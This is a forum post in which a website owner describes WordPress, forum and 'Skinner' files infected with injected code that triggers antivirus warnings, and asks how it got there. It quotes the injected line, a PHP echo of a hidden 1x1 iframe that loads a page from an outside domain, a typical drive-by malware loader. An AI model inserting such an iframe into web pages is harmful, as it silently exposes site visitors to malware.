From the very beginning when I first entered my site I was greeted by a blank white page with the above quoted error (ajax). I also got numerous of popups in the bottom right corner by my comp/anti-virus stating a virus has been deleted from my computer, the moment I entered the site. [[http://img187.imageshack.us/img187/4590/viruaj9.jpg]] Since this popup never appeared during browsing of other sites, I assumed something must be wrong with MY site. Since I, in addition was getting the ajax error, I assumed it was a wordpress plugin problem, deleted the ajax folder through my FTP (since I couldn't access my site/wordpress blog by using a browser) After deleting the plugin I was still having problems, and my site was still trying to install that virus on my computer.
So I proceeded, deleting ALL plugins. No change. I did a search on the forum and saw people had had some similar problems, so I skimmed through a few wordpress files, like recommended previously in other threads, such as the themes and index file, and sure, I saw some malicious coding had been inserted in those files, I have NO idea how it got there. The unfamiliar code looks like this:
<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>
I still suspect is has SOMETHING to do with the plugins, I don't know WHICH plugin since I recently, a couple of weeks ago, installed about 10 or 15 new plugins.
I was frustrated, feeling stressed, and deleted the complete wordpress folder, thought 'problem solved'. I was wrong. After deleting my wordpress folder, I was STILL gettin the darn warning/notice about a virus being blocked. Meaning my site is still infected. So I deleted my XMB forum. Or any script I thought could be causing the virus. Now I try to use as few scripts as possible because I know there is always a security risk. After deleting both wordpress and xmb, I was still getting the virus warning. I use a script called "Skinner", I've used it for years and never experienced problems with it before, but now, skimming through some Skinner files, I see that darn code again! It's all over the place! So I delete the files, uploaded the original files ... and that's where I am standing right now. I still get the virus warning ... so I need to delete my site and upload fresh files.
What the HECK is going on?!
In the future, how can I locate the source instead of just deleting the whole script? How can I know which plugins are safe and which arent? How the heck could someone insert code in my files?! I really don't understand this.
UPDATE: looks like the ugly coding has been added to ALL my pages, even the ones that aren't related to any scripts! I use regular HTML and some php, to include a header and footer. This is queer. Okay so now I know how to get rid of it, but I want to know how it got there in the first place.